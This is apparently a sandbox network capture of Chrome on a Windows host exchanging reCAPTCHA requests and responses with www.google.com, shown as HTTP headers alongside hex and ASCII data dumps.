                                                                                                                                                                                                                                                                  2024-10-29 19:11:02 UTC1243INData Raw: 37 54 4b 69 74 4b 69 4b 49 6e 41 78 34 47 34 45 67 77 70 36 45 54 44 5f 34 59 47 37 68 37 57 66 7a 6e 72 67 49 59 6d 57 6b 6a 49 41 64 59 70 30 71 75 37 4b 58 46 6d 39 48 74 5f 55 57 6f 4b 4a 36 6b 53 71 71 61 78 4d 4e 57 4e 5f 51 2d 6d 6c 36 7a 51 63 76 36 7a 30 64 56 6a 63 6c 64 58 4b 75 4f 79 4b 50 6f 57 56 6f 4d 4d 5f 5a 7a 38 4f 61 67 65 43 56 66 47 37 4f 6d 6e 47 46 44 57 4c 35 63 54 37 4b 42 2d 74 5a 57 48 35 66 36 49 4f 75 35 37 59 44 68 4d 72 4d 43 38 5f 31 36 41 71 6d 4a 4d 49 53 6b 41 39 4b 50 42 79 65 61 6a 4d 70 71 50 30 6f 33 36 6c 73 53 78 67 62 46 5f 6c 75 2d 65 53 56 36 70 42 36 70 62 61 54 56 72 59 35 6c 56 4c 50 62 39 68 38 33 79 5a 70 39 7a 4e 55 33 69 57 4b 4b 35 59 65 49 41 43 48 6d 45 5a 55 71 4a 66 74 6a 49 5a 62 6e 79 53 41 42 30
                                                                                                                                                                                                                                                                  Data Ascii: 7TKitKiKInAx4G4Egwp6ETD_4YG7h7WfznrgIYmWkjIAdYp0qu7KXFm9Ht_UWoKJ6kSqqaxMNWN_Q-ml6zQcv6z0dVjcldXKuOyKPoWVoMM_Zz8OageCVfG7OmnGFDWL5cT7KB-tZWH5f6IOu57YDhMrMC8_16AqmJMISkA9KPByeajMpqP0o36lsSxgbF_lu-eSV6pB6pbaTVrY5lVLPb9h83yZp9zNU3iWKK5YeIACHmEZUqJftjIZbnySAB0
                                                                                                                                                                                                                                                                  2024-10-29 19:11:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  97192.168.2.1649828142.250.186.1644437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC612OUTGET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:03 GMT
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Allow: POST
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC635INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                  Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC1036INData Raw: 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67
                                                                                                                                                                                                                                                                  Data Ascii: idth:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#log
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  98192.168.2.1649830142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC998OUTPOST /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 5814
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.google.com
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC5814OUTData Raw: 76 3d 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 26 63 3d 30 33 41 46 63 57 65 41 34 4c 6c 4b 4f 4c 65 4a 57 7a 39 5a 38 58 64 33 54 6c 4b 37 43 6c 74 41 35 68 68 69 78 43 54 33 70 71 55 63 41 41 62 4e 33 70 51 2d 70 38 72 44 6b 6d 74 30 78 52 73 75 63 41 6b 55 30 36 66 5a 6a 65 6a 7a 73 62 33 50 33 2d 33 47 50 72 74 35 77 71 76 5f 53 50 34 36 6e 77 38 2d 6a 7a 6a 67 4b 4b 62 51 32 5f 68 2d 72 31 78 69 50 4d 36 54 59 49 6a 52 65 41 6d 51 49 6e 57 6d 35 2d 44 37 4b 45 66 56 73 4c 43 4b 39 47 4b 78 43 30 72 53 33 32 39 30 55 76 52 38 44 4b 6b 35 54 6e 68 4f 4c 4a 48 44 4c 35 49 74 4b 5a 6e 65 36 66 50 31 44 68 67 51 79 37 32 67 4e 72 65 69 63 73 36 77 63 7a 67 59 71 58 65 63 6b 6d 6e 33 63 44 5f 6f 76 50 4a 4d 54 45 44 50 39 59
                                                                                                                                                                                                                                                                  Data Ascii: v=-ZG7BC9TxCVEbzIO2m429usb&c=03AFcWeA4LlKOLeJWz9Z8Xd3TlK7CltA5hhixCT3pqUcAAbN3pQ-p8rDkmt0xRsucAkU06fZjejzsb3P3-3GPrt5wqv_SP46nw8-jzjgKKbQ2_h-r1xiPM6TYIjReAmQInWm5-D7KEfVsLCK9GKxC0rS3290UvR8DKk5TnhOLJHDL5ItKZne6fP1DhgQy72gNreics6wczgYqXeckmn3cD_ovPJMTEDP9Y
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC694INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:03 GMT
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC684INData Raw: 31 37 62 62 0d 0a 29 5d 7d 27 0a 5b 22 64 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 35 31 68 35 34 6b 43 36 55 72 34 42 6c 41 50 68 59 31 75 67 58 63 7a 55 50 74 35 78 34 55 62 34 61 77 4d 32 67 4e 64 76 59 62 46 30 69 78 56 78 56 42 58 55 71 74 4d 62 30 54 7a 7a 44 69 34 66 44 73 78 79 42 64 38 4e 2d 4c 4f 73 38 44 45 7a 70 51 46 4c 4d 55 5a 49 42 35 6a 30 53 36 31 70 50 56 73 56 6e 67 41 72 5f 39 4c 51 78 79 43 6b 58 4a 75 4f 53 51 39 6d 63 55 32 77 56 2d 76 63 70 79 4d 47 6c 31 46 39 65 5a 49 74 45 79 59 51 4a 78 54 64 71 78 69 33 57 73 53 71 69 6d 56 79 51 61 6f 6a 2d 44 57 6b 42 79 77 38 79 6e 36 68 61 42 34 32 58 51 36 4b 35 39 6b 2d 75 6a 30 43 33 57 62 6a 57 5f 39 47 41 37 6a 54 47 33 6c 53 50 44 6a 78 31 65 6e 79 66 37 58 33 67 37 52 4c 61 35
                                                                                                                                                                                                                                                                  Data Ascii: 17bb)]}'["dresp","03AFcWeA51h54kC6Ur4BlAPhY1ugXczUPt5x4Ub4awM2gNdvYbF0ixVxVBXUqtMb0TzzDi4fDsxyBd8N-LOs8DEzpQFLMUZIB5j0S61pPVsVngAr_9LQxyCkXJuOSQ9mcU2wV-vcpyMGl1F9eZItEyYQJxTdqxi3WsSqimVyQaoj-DWkByw8yn6haB42XQ6K59k-uj0C3WbjW_9GA7jTG3lSPDjx1enyf7X3g7RLa5
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC1378INData Raw: 6b 4f 6c 37 73 4c 36 7a 4a 67 43 6d 65 53 78 78 6c 7a 52 77 4b 58 7a 2d 39 79 5f 36 70 6c 71 52 48 44 53 69 45 67 36 66 57 70 50 56 33 59 65 44 36 5a 41 4e 73 4c 78 6f 38 50 6a 34 31 6f 32 56 4f 6f 48 73 76 4a 61 79 47 4a 5a 38 66 59 4d 35 54 4a 6a 62 75 32 39 6c 36 6a 53 77 6a 61 49 64 39 5a 4a 70 5a 31 68 58 4c 78 7a 47 65 79 78 77 35 62 59 39 6d 5f 51 2d 35 48 35 6a 53 30 57 38 69 53 39 45 75 75 70 38 6c 36 73 39 63 6c 79 6f 42 37 70 34 68 4e 4d 53 4f 79 51 75 61 67 6a 67 6f 6e 71 50 31 68 74 4d 4c 36 54 43 31 49 32 44 69 38 46 65 4b 79 4d 59 35 34 6a 48 39 46 74 63 57 4b 69 76 6b 36 6d 54 58 4c 46 66 35 30 6a 5f 76 43 30 61 67 37 79 68 71 57 37 55 49 6a 75 38 31 50 39 4b 55 76 66 45 71 38 6d 50 64 67 63 6f 59 79 79 6c 77 78 43 71 6e 41 6a 58 53 4e 4e
                                                                                                                                                                                                                                                                  Data Ascii: kOl7sL6zJgCmeSxxlzRwKXz-9y_6plqRHDSiEg6fWpPV3YeD6ZANsLxo8Pj41o2VOoHsvJayGJZ8fYM5TJjbu29l6jSwjaId9ZJpZ1hXLxzGeyxw5bY9m_Q-5H5jS0W8iS9Euup8l6s9clyoB7p4hNMSOyQuagjgonqP1htML6TC1I2Di8FeKyMY54jH9FtcWKivk6mTXLFf50j_vC0ag7yhqW7UIju81P9KUvfEq8mPdgcoYyylwxCqnAjXSNN
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC1378INData Raw: 62 71 4a 59 6f 37 6c 39 35 7a 52 4f 34 52 32 63 46 6a 35 45 59 76 66 6d 76 62 53 55 39 79 66 7a 71 75 68 37 38 63 62 49 53 79 4f 41 64 69 6a 4f 45 6f 41 46 2d 39 42 47 57 42 4a 75 68 68 46 6b 45 69 73 33 73 31 49 39 57 46 6b 76 42 4a 34 49 2d 62 47 55 44 59 72 71 31 46 67 39 61 2d 67 4b 4f 49 2d 39 57 76 55 62 6d 6f 79 6a 5f 2d 55 75 5a 30 71 46 55 69 4c 33 62 39 66 56 5f 64 46 4c 70 62 45 6c 6f 33 67 76 70 33 2d 47 6d 38 57 74 55 6a 30 43 51 58 39 56 6e 78 47 4e 41 34 42 41 74 62 6d 54 58 4f 75 70 53 66 51 6f 52 5f 50 66 72 53 4f 61 70 59 6f 64 36 4d 4f 34 65 2d 72 5f 77 4a 43 74 58 6e 46 4f 30 63 6e 66 75 73 67 33 58 32 47 33 35 71 76 52 6d 4f 4e 44 38 72 51 4a 33 63 67 4b 79 72 35 63 55 6b 6d 48 6a 6a 62 6d 44 69 78 68 59 50 48 4b 6f 68 71 5a 74 75 4a
                                                                                                                                                                                                                                                                  Data Ascii: bqJYo7l95zRO4R2cFj5EYvfmvbSU9yfzquh78cbISyOAdijOEoAF-9BGWBJuhhFkEis3s1I9WFkvBJ4I-bGUDYrq1Fg9a-gKOI-9WvUbmoyj_-UuZ0qFUiL3b9fV_dFLpbElo3gvp3-Gm8WtUj0CQX9VnxGNA4BAtbmTXOupSfQoR_PfrSOapYod6MO4e-r_wJCtXnFO0cnfusg3X2G35qvRmOND8rQJ3cgKyr5cUkmHjjbmDixhYPHKohqZtuJ
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC1378INData Raw: 42 43 41 59 4f 32 71 34 58 6c 49 79 38 36 38 45 41 72 6d 68 58 72 4d 2d 34 53 65 6b 7a 6b 5a 79 35 49 31 71 48 76 4a 63 62 4c 4e 58 71 66 35 47 4a 63 5a 5a 46 72 67 6e 53 72 71 5a 53 72 76 5f 6d 4e 6d 70 67 4f 52 61 64 6a 6f 39 74 6f 4f 67 44 2d 58 79 32 73 47 71 78 45 61 6d 74 58 67 67 48 55 31 44 63 59 6c 54 46 4f 77 73 75 5f 64 64 2d 55 35 2d 42 5f 6e 49 6e 62 79 46 4f 53 78 34 52 66 46 57 4b 54 36 4b 71 65 51 63 47 72 67 72 30 57 75 65 6b 46 5f 46 72 37 31 42 39 49 56 30 75 62 31 2d 76 49 69 71 4d 4a 55 79 54 38 4f 6c 4e 7a 5f 68 77 32 66 6d 30 34 5f 5a 57 53 61 43 69 48 32 70 2d 44 7a 56 66 6d 32 65 53 4c 49 51 33 59 7a 38 39 6e 65 37 39 4d 78 5a 56 32 50 4a 76 64 78 32 66 35 69 4a 51 34 7a 55 57 30 76 67 6e 57 30 53 5a 48 4f 44 63 4f 57 78 6c 47 6a
                                                                                                                                                                                                                                                                  Data Ascii: BCAYO2q4XlIy868EArmhXrM-4SekzkZy5I1qHvJcbLNXqf5GJcZZFrgnSrqZSrv_mNmpgORadjo9toOgD-Xy2sGqxEamtXggHU1DcYlTFOwsu_dd-U5-B_nInbyFOSx4RfFWKT6KqeQcGrgr0WuekF_Fr71B9IV0ub1-vIiqMJUyT8OlNz_hw2fm04_ZWSaCiH2p-DzVfm2eSLIQ3Yz89ne79MxZV2PJvdx2f5iJQ4zUW0vgnW0SZHODcOWxlGj
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC1265INData Raw: 37 55 6d 4d 72 5f 6f 6e 66 58 5f 5f 69 52 4d 52 2d 66 69 59 50 6f 76 54 71 36 5f 6a 62 67 71 32 70 2d 34 6d 47 65 46 64 44 59 6f 63 2d 30 46 56 30 49 70 59 43 77 62 5f 31 34 6a 77 75 61 36 6d 65 61 64 39 74 38 64 6b 6b 4d 30 4c 67 71 6f 48 4d 53 56 32 4e 73 57 37 68 5a 45 6b 4b 54 36 4c 36 44 37 6f 74 77 66 4d 56 78 65 45 65 51 58 51 2d 43 4e 41 39 73 78 36 71 38 58 52 32 63 78 79 7a 51 45 75 75 67 71 53 30 52 6f 68 46 39 59 67 42 6d 44 48 4e 71 6d 34 2d 4f 36 4b 77 39 62 70 72 76 67 67 4d 4c 64 43 78 74 45 5a 71 31 6b 5f 41 72 6f 6b 31 50 49 51 2d 50 34 6c 64 6f 6d 38 54 63 62 42 31 4a 61 34 49 48 53 52 6b 7a 63 47 68 30 65 46 58 2d 62 6a 39 77 71 77 32 59 73 59 4d 6a 48 57 74 6c 71 51 35 42 4b 52 4f 55 74 39 73 7a 66 31 37 79 35 5a 43 52 4a 46 6c 78 62
                                                                                                                                                                                                                                                                  Data Ascii: 7UmMr_onfX__iRMR-fiYPovTq6_jbgq2p-4mGeFdDYoc-0FV0IpYCwb_14jwua6mead9t8dkkM0LgqoHMSV2NsW7hZEkKT6L6D7otwfMVxeEeQXQ-CNA9sx6q8XR2cxyzQEuugqS0RohF9YgBmDHNqm4-O6Kw9bprvggMLdCxtEZq1k_Arok1PIQ-P4ldom8TcbB1Ja4IHSRkzcGh0eFX-bj9wqw2YsYMjHWtlqQ5BKROUt9szf17y5ZCRJFlxb
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  99192.168.2.1649829142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC1190OUTGET /recaptcha/api2/payload?p=06AFcWeA5CRWb0pqYXQQK9znJ5KV0VwEOa4LwTb8cyN7pOwIZZ04W9ux6A5u-MAbH1xLyDQMREJb298rgjzqYg-SfwWz7xWuHpDGxazw8zRRljMsmI_2zKtxQ_m35rkCI5Lk7f5FhQABxvWvoIdrGF0A4ARXIg27QobrPOi2xAvxvGvMxG3zZi2Qucrr1lJTYtpc5XFS8wOT6E2kdH05v1_mpmO1RBCjs__A&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=70db3a36bb8782c5 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:11:03 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:03 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC697INData Raw: 31 30 36 65 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 106eJFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:11:03 UTC1378INData Raw: 3e 37 92 39 24 e0 f5 a8 2d 63 95 ae 7c d2 46 4f a1 f6 ab 82 20 f2 8f ef 63 2c d5 6e d7 39 9e a6 b6 93 6e 91 c6 24 76 6f 9b ba f5 c5 5e 68 de c2 28 89 0a ca e4 f2 4e 31 db f3 15 99 65 76 d6 e8 bb 80 65 dd 80 33 d0 f6 ab 12 48 d7 ca a1 d9 dd 56 5c 30 fe ee 40 c7 f2 fd 2b 8e 4d de dd 07 18 39 3b 88 2d e3 65 09 bd 37 ba 87 66 07 3b 46 48 c7 e5 fc e9 b8 16 97 b1 5b e0 be dc 97 6e 46 38 f6 3d 05 49 2c e5 1b cf 0e ea 51 3e 5c aa f0 72 00 fe 75 a1 a4 c6 6e e1 69 9f e5 92 4d a1 a4 c0 03 1b 46 72 7e a6 94 ae 95 fa 1d 3e c5 de e8 4d 36 d5 2d 2e 64 92 15 17 1b 86 4b 38 ce 3a 70 2b b1 f8 65 73 1d bd db 7d b5 a3 b5 0a 0b f9 8c 85 82 80 78 40 b9 19 dc 7a e3 9f 4e f5 82 96 77 09 68 c8 51 65 95 5c a9 0b f7 94 7d 05 32 da c3 54 8c 33 20 97 0d c3 6e 89 b2 79 f5 0a 33 cd 61
                                                                                                                                                                                                                                                                  Data Ascii: >79$-c|FO c,n9n$vo^h(N1eve3HV\0@+M9;-e7f;FH[nF8=I,Q>\runiMFr~>M6-.dK8:p+es}x@zNwhQe\}2T3 ny3a
